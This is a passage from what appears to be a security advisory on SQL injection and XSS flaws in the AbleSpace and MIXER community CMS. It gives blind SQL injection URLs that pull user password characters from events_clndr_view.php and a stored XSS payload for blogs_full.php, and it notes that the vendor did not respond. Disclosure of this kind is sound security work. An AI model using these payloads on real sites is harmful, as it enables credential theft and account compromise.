1.2 Attacker can inject SQL code in events_clndr_view.php vulnerable parametr id
Example:
http://[server]/[installdir]/events_clndr_view.php?id=1 and substring(@@version,1,1)=4
http://[server]/[installdir]/events_clndr_view.php?id=1 and ascii(substring((select password from user where name='Mike'),1,1)) between 97 and 103
http://[server]/[installdir]/events_clndr_view.php?id=1 and ascii(substring((select concat_ws(0x3a,name,password) from user where name='Mike'),1,1)) =77
http://[server]/[installdir]/events_clndr_view.php?id=1 and ascii(substring((select concat_ws(0x3a,name,password) from user where user_id=1),1,1)) between 1 and 200
2. Stored XSS
2.1 Vulnerability found in script blogs_full.php
Example:
<IMG SRC=javascript:alert('XSS')>
3. Multiple Linked XSS
3.1 Linked XSS vulnerabiliies found in groups_profile.php. GET parameter "gid"
Able - движек для создания коммунити с кучей примочек.
MIXER - практически идентичный AbleSpace движек, но продаваемый как самостоятельная CMS, баги теже самые.
писали вендору несколько раз без ответно.